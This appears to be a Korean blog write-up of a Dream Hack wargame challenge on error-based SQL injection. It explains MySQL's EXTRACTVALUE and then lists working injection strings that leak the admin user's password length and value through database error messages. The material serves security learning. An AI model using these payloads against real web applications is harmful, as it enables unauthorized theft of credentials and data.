[Dream Hack - Web] error based sql injection

Error Based SQL Injection

공격자가 웹 애플리케이션에서 발생하는 에러 메시지를 이용해 데이터베이스의 구조나 내부 정보를 획득하는 공격기법이다. 공격자는 SQL 쿼리의 취약점을 이용하여 에러를 유도하고, 그 에러를 분석하여 정보를 추출한다.

EXTRACTVALUE( {XML 형식의 값}, {XPath 조건식} )

특정한 XPath 조건식을 기반으로 XML 문서에서 값을 추출하는 데 사용된다.

- BOOK_XML

<STORE>
	<BOOK> 
		<TITLE>어린 왕자</TITLE> 
		<AUTHOR>앙투안 드 생택쥐페리</AUTHOR> 
		<PRICE>9,800</PRICE> 
	</BOOK> 
</STORE>

- 예시 쿼리

SELECT EXTRACTVALUE(BOOK_XML, '/STORE/BOOK/TITLE') FROM BOOK_LIST;

- 실행 결과

어린왕자

flag 길이 구하기

' or extractvalue(1, concat(0x3a, (select length(upw) from user where uid = 'admin'))) and '1' = '1
:44

- 출력하기

' or extractvalue(1, concat(0x3a, (select upw from user where uid = 'admin'))) and '1' = '1

- 뒷 부분 출력하기

' or extractvalue(1, concat(0x3a, (select right(upw, 20) from user where uid = 'admin'))) and '1' = '1

[Dream Hack - Web] sql injection bypass WAF (0)	2024.08.14
[Dream Hack - Web] csrf-2 (0)	2024.08.07
[Dream Hack - Web] csrf-1 (0)	2024.08.07
[Dream Hack - Web] xss-2 (0)	2024.08.02
[Dream Hack - Web] xss-1 (0)	2024.08.02